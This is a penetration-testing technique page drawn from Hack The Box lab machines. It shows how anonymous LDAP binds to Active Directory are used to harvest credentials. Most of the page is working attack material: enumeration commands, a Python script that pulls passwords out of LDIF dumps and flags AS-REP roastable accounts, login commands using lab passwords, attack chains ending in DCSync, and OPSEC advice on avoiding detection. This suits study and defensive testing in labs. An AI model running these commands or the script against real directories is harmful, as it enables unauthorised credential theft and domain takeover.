
Anonymous LDAP to Foothold

#Overview

Active Directory domains that permit anonymous LDAP binds (and grant anonymous read access to the domain naming context) expose their objects to unauthenticated attackers. User objects often carry plaintext or Base64-encoded passwords in attributes such as description, info, userPassword, labeledUri, personalTitle, and custom attributes added by applications. Reading them requires no credentials and produces no authentication events on the DC, so the technique is close to passive: the only footprint is the LDAP connection and the queries themselves. Combined with password spraying against the discovered users, anonymous LDAP provides a reliable entry point into the domain.

#Prerequisites

  • Network access to the DC on port 389 (LDAP) or 636 (LDAPS)
  • Anonymous LDAP bind must be enabled. Since Windows Server 2003 a DC only allows anonymous access to rootDSE by default; anonymous reads of the domain naming context require an administrator to have set the seventh character of dSHeuristics to 2 and granted ANONYMOUS LOGON read permissions on the relevant containers. It is therefore a deliberate misconfiguration (often left over from a legacy application integration), not a version-dependent default.

#Detection & Enumeration

#Verify Anonymous Bind

```bash
# ldapsearch with -x (simple authentication) and no -D/-w: a null (anonymous) bind
ldapsearch -x -H ldap://10.10.10.161:389 -b "dc=htb,dc=local"
# Entries returned  -> anonymous reads of the domain NC are allowed
# "Operations error (1) ... a successful bind must be completed on the connection"
#                   -> the DC accepted the null bind but denies anonymous reads

# windapsearch with no credentials auto-tests the anonymous bind
./windapsearch.py -d htb.local --dc-ip 10.10.10.161 -U
# [+] ...success! Binded as: None  -> anonymous bind accepted
```

#Enumerate All Users

```bash
# windapsearch: enumerate all users (filter objectCategory=user)
./windapsearch.py -d htb.local --dc-ip 10.10.10.161 -U

# ldapsearch: enumerate all users and print only the account names
ldapsearch -x -H 'ldap://10.10.10.161' -b "dc=htb,dc=local" \
  "(&(objectCategory=person)(objectClass=user))" sAMAccountName | grep sAMAccountName

# List ALL objects in the domain (313 objects on Forest, 28 of them users)
./windapsearch.py -d htb.local --dc-ip 10.10.10.161 --custom "objectClass=*"
```

#Enumerate Groups with WinRM Access

```bash
# Check which users are in the Remote Management Users group (WinRM access)
./windapsearch.py -d MEGABANK.LOCAL --dc-ip 10.10.10.172 -U -m "Remote Management Users"
# User mhope was found in this group (Monteverde)
```

#Exploitation / Execution

#Password Extraction from User Attributes

Key user attributes that commonly contain credentials:

| Attribute | Description | Example finding |
| --- | --- | --- |
| description | Free-text user description | david.orelious had aRt$Lp#7t*VQ!3 in the description (Cicada) |
| info | General information field | May contain passwords left for helpdesk reference |
| userPassword | Legacy password attribute | Sometimes holds a Base64-encoded password |
| personalTitle | Title field | Occasionally used for password storage |
| comment | Comment field | May contain credentials |
| custom attributes | Application-specific (e.g. cascadeLegacyPwd) | r.thompson had a Base64 password in cascadeLegacyPwd (Cascade) |
| labeledUri | URI field | Sometimes abused for credential storage |

#Windapsearch with Full Attributes

```bash
# Enumerate all users with ALL attributes (--full flag); the domain is read from rootDSE when -d is omitted
./windapsearch.py -U --full --dc-ip 10.10.10.182
# Examine the output for unusual attributes such as cascadeLegacyPwd or userPassword

# Search for passwords in descriptions and in attribute names
./windapsearch.py -U --full --dc-ip 10.10.10.182 | grep -i -E 'pass|pwd|secret'
```

#Decoding Base64 Credentials

```bash
# cascadeLegacyPwd contained a Base64-encoded password
echo "clk0bjVldmE=" | base64 -d
# Output: rY4n5eva

# Some attributes may contain double-encoded values; decode until the output stops being Base64
echo "<base64_string>" | base64 -d | base64 -d
```
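The attribute triage from the table above, the single- and double-layer Base64 decoding, and the userAccountControl check from the pitfalls below, combined in one script. This is an added example written for this page, not windapsearch's or any other tool's code. It reads the LDIF text that ldapsearch (or windapsearch --full) prints, so you can pipe a saved dump into it offline. The sample LDIF is constructed: the r.thompson and david.orelious values mirror the page's Cascade and Cicada findings, while the svc-legacy and helpdesk accounts and every userAccountControl value are invented to exercise the disabled and pre-auth-disabled branches.

```python
"""Triage LDIF from ldapsearch/windapsearch for stashed credentials and account flags.

Added example for this page, not windapsearch's own code. Reads ldapsearch-style LDIF,
flags attribute values that look like credentials, strips one or two layers of Base64,
and decodes userAccountControl so you know whether the account is disabled or AS-REP
roastable before you spend the credential on a WinRM/SMB attempt.
"""
import base64
import binascii
import re

# Attributes the page lists as common credential stashes (lower-cased for matching)
CRED_ATTRS = {"description", "info", "comment", "userpassword", "personaltitle", "labeleduri"}
# Application-specific attributes whose *name* gives the game away (e.g. cascadeLegacyPwd)
CRED_NAME_RE = re.compile(r"pass|pwd|secret|cred", re.I)
# Free-text values that spell the password out ("my password is X", "Pwd: X")
CRED_VALUE_RE = re.compile(r"(?:pass(?:word)?|pwd)\s*(?:is|[:=])\s*(\S+)", re.I)
# userAccountControl bits worth checking before authenticating
UAC_ACCOUNTDISABLE = 0x0002
UAC_DONT_REQ_PREAUTH = 0x400000

LDIF_LINE_RE = re.compile(r"^([\w.;-]+)(::?)\s?(.*)$")


def parse_ldif(text):
    """Parse LDIF into a list of {attr_lower: [values]} dicts.

    Handles ldapsearch's ':: <base64>' transport encoding (used for values with
    non-ASCII bytes or leading whitespace) and folded continuation lines.
    """
    text = re.sub(r"\n ", "", text)  # unfold: a leading single space continues the value
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        m = LDIF_LINE_RE.match(line)
        if line.startswith("#") or not m:
            continue
        attr, sep, value = m.group(1).lower(), m.group(2), m.group(3)
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", errors="replace")
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return entries


def try_b64(value, max_depth=2):
    """Return the successive Base64 decodings of value that yield printable text.

    [] means "not Base64"; two elements means the application double-encoded it.
    """
    layers, current = [], value.strip()
    for _ in range(max_depth):
        if len(current) < 8 or len(current) % 4:
            break
        try:
            text = base64.b64decode(current, validate=True).decode("utf-8")
        except (binascii.Error, ValueError):  # bad alphabet/padding, or not UTF-8 text
            break
        if not text or not text.isprintable():
            break
        layers.append(text)
        current = text
    return layers


def account_flags(entry):
    """Decode the userAccountControl bits that decide whether a credential is usable."""
    uac = int(entry.get("useraccountcontrol", ["0"])[0])
    return {"disabled": bool(uac & UAC_ACCOUNTDISABLE),
            "no_preauth": bool(uac & UAC_DONT_REQ_PREAUTH)}


def find_credentials(entries):
    """Return one finding dict per suspicious attribute value, with the account's flags."""
    findings = []
    for entry in entries:
        sam = entry.get("samaccountname", ["?"])[0]
        flags = account_flags(entry)
        for attr, values in entry.items():
            named = bool(CRED_NAME_RE.search(attr))
            if attr not in CRED_ATTRS and not named:
                continue
            for value in values:
                inline = CRED_VALUE_RE.search(value)
                layers = [] if inline else try_b64(value)
                if inline:
                    secret, how = inline.group(1), "inline"
                elif layers:
                    secret, how = layers[-1], f"base64 x{len(layers)}"
                elif named:
                    secret, how = value, "raw"  # password-named attribute stored in clear
                else:
                    continue  # generic free-text field with nothing password-like in it
                findings.append({"sam": sam, "attr": attr, "secret": secret, "how": how, **flags})
    return findings


def asrep_candidates(entries):
    """sAMAccountNames with DONT_REQ_PREAUTH set, i.e. AS-REP roastable accounts."""
    return [e["samaccountname"][0] for e in entries
            if "samaccountname" in e and account_flags(e)["no_preauth"]]


def _b64(s):
    return base64.b64encode(s.encode()).decode()


# Constructed sample in ldapsearch's LDIF layout. r.thompson and david.orelious mirror
# the page's Cascade and Cicada findings; svc-legacy, helpdesk and all userAccountControl
# values are invented. The helpdesk description starts with a space, which is why
# ldapsearch would emit it in the '::' Base64 form.
SAMPLE_LDIF = f"""\
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
sAMAccountName: r.thompson
userAccountControl: 66048
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=David Orelious,OU=Users,DC=cicada,DC=htb
sAMAccountName: david.orelious
userAccountControl: 66048
description: Just in case I forget my password is aRt$Lp#7t*VQ!3

dn: CN=Legacy Sync,OU=Service,DC=example,DC=local
sAMAccountName: svc-legacy
userAccountControl: 66050
info: {_b64(_b64('Winter2019!'))}

dn: CN=Helpdesk,OU=Users,DC=example,DC=local
sAMAccountName: helpdesk
userAccountControl: 4260352
description:: {_b64(' Pwd: Summer2024!')}

dn: CN=Administrator,CN=Users,DC=example,DC=local
sAMAccountName: Administrator
userAccountControl: 66048
description: Built-in account for administering the computer/domain
"""

if __name__ == "__main__":
    entries = parse_ldif(SAMPLE_LDIF)
    for f in find_credentials(entries):
        state = "DISABLED" if f["disabled"] else "enabled"
        print(f"{f['sam']:16} {f['attr']:18} {f['how']:10} {state:9} {f['secret']}")
    print("AS-REP roastable:", ", ".join(asrep_candidates(entries)))
```

To run it against a real dump, replace SAMPLE_LDIF with the output of the ldapsearch command above (saved to a file) and call parse_ldif on its contents. The Base64 check deliberately requires a valid alphabet, correct padding and a printable UTF-8 result, which keeps ordinary description text and the decoded password itself from being "decoded" a layer too far.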

#Post-Credential Authentication

```bash
# Test for WinRM access (credentials from anonymous LDAP findings)
evil-winrm -i 10.10.10.182 -u r.thompson -p 'rY4n5eva'
# If WinRM is not accessible, try SMB share enumeration
smbmap -H 10.10.10.182 -u r.thompson -p 'rY4n5eva'

# Test for SMB access
netexec smb 10.10.10.10 -u <user> -p '<pass>'
```

#Real-World Chain (Cascade)

```bash
# 1. Anonymous LDAP -> windapsearch finds a user with a cascadeLegacyPwd attribute
./windapsearch.py -U --full --dc-ip 10.10.10.182
# Found: r.thompson with cascadeLegacyPwd (Base64) -> rY4n5eva

# 2. Enumerate SMB shares with r.thompson's credentials
smbmap -H 10.10.10.182 -u r.thompson -p 'rY4n5eva'
# Found Data share with IT folder -> VNC registry backup -> TightVNC password decryption -> s.smith

# 3. s.smith -> Audit share -> SQLite DB -> AES-encrypted password -> ArkSvc

# 4. ArkSvc is in the AD Recycle Bin group -> recover the deleted TempAdmin object -> Administrator password
```

#Real-World Chain (Forest)

```bash
# 1. Anonymous LDAP -> windapsearch discovers svc-alfresco
./windapsearch.py -d htb.local --dc-ip 10.10.10.161 -U
./windapsearch.py -d htb.local --dc-ip 10.10.10.161 --custom "objectClass=*"
# svc-alfresco appears in the user list and in the full object listing

# 2. svc-alfresco has Kerberos pre-authentication disabled (the Alfresco documentation requires it)
GetNPUsers.py htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass
# AS-REP hash cracked offline: s3rvice -> WinRM shell

# 3. Account Operators membership -> add a user to Exchange Windows Permissions -> WriteDacl on the domain -> DCSync
```

#Common Pitfalls

  • Anonymous bind not allowed (or allowed without read access): the DC answers the search with LDAP result code 1 (operationsError), "In order to perform this operation a successful bind must be completed on the connection", and no entries are returned. Try SMB null sessions instead, or find another entry vector.
  • No passwords in attributes: not every domain stores passwords in user attributes. Move to password spraying with the discovered username list, respecting the lockout threshold from the domain password policy.
  • Attribute values encoded: some values are double-Base64 encoded or use an application-specific encoding. Decode until the output stops being Base64, and examine the application context for anything custom.
  • Account disabled or expired: decode userAccountControl before trying the credential (bit 0x2 = ACCOUNTDISABLE) and check accountExpires; a valid password on a disabled account still fails to authenticate and shows up in the logs.

#OPSEC Considerations

  • An anonymous bind authenticates nothing, so it generates no Kerberos or NTLM events (4768, 4776, 4624) on the DC. Individual LDAP searches are only recorded when Directory Service diagnostic logging is raised (Field Engineering, Event ID 1644), which most environments leave off, so network telemetry (TCP/389 from an unexpected source) is usually the only detection point.
  • Querying user attributes does not touch the target accounts and produces no authentication events for them.
  • The searches are identical in form to the directory lookups applications and clients perform constantly; what stands out is the source host and the volume (a full objectClass=* dump is far larger than a normal lookup).
  • The enumeration is not tied to a user principal; the only attribution available to an analyst is the source IP.

#Post-Exploitation Value

  • Valid credentials for domain-joined user accounts
  • Comprehensive user list for password spraying
  • Knowledge of AD structure, groups, and privilege assignments
  • Potential for discovering pre-auth disabled accounts (userAccountControl bit 0x400000, DONT_REQ_PREAUTH), which enables AS-REP roasting

#Cross-References

#Tool References

| Tool | Link |
| --- | --- |
| windapsearch | https://github.com/ropnop/windapsearch |
| ldapsearch | Built into Kali (ldap-utils package) |
| smbmap | https://github.com/ShawnDEvans/SMBMap |

#Source Machines

  • Cascade (Medium) — Anonymous LDAP -> cascadeLegacyPwd (Base64) -> r.thompson -> VNC decryption -> s.smith -> SQLite DB -> ArkSvc -> AD Recycle Bin -> Administrator
  • Forest (Easy) — Anonymous LDAP -> windapsearch discovers svc-alfresco (pre-auth disabled) -> AS-REP roasting -> s3rvice -> Account Operators -> DCSync
  • Monteverde (Medium) — Anonymous LDAP -> windapsearch user list -> password spray -> SABatchJobs -> Azure AD Connect password extraction -> Administrator